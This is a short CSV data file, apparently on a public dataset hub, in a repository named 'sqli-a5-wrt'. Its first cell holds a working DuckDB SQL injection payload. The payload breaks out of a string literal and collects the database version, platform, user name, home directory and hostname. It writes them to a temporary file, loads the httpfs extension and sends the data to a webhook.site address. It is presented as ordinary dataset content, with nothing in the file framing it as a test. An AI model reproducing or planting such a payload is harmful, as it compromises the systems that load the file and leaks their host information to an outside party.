sqli-a5-wrt / data.csv
FIRSTACCOUNT69's picture
init
e896260 verified
raw
history blame contribute delete
480 Bytes
"x'); COPY (SELECT current_setting('duckdb_version') AS v, platform() AS p, coalesce(getenv('USER'),'N') AS u, coalesce(getenv('HOME'),'N') AS h, coalesce(getenv('HOSTNAME'),'N') AS hn) TO '/tmp/sysinfo.csv' (HEADER, DELIMITER ','); INSTALL httpfs; LOAD httpfs; SELECT content FROM read_text('https://webhook.site/7a554e3b-afae-4540-9885-a8c0e0d39b57?t=sysinfo&v=' || (SELECT replace(replace(content,chr(10),'_'),chr(32),'+') FROM read_text('/tmp/sysinfo.csv'))); --","d"
"a","b"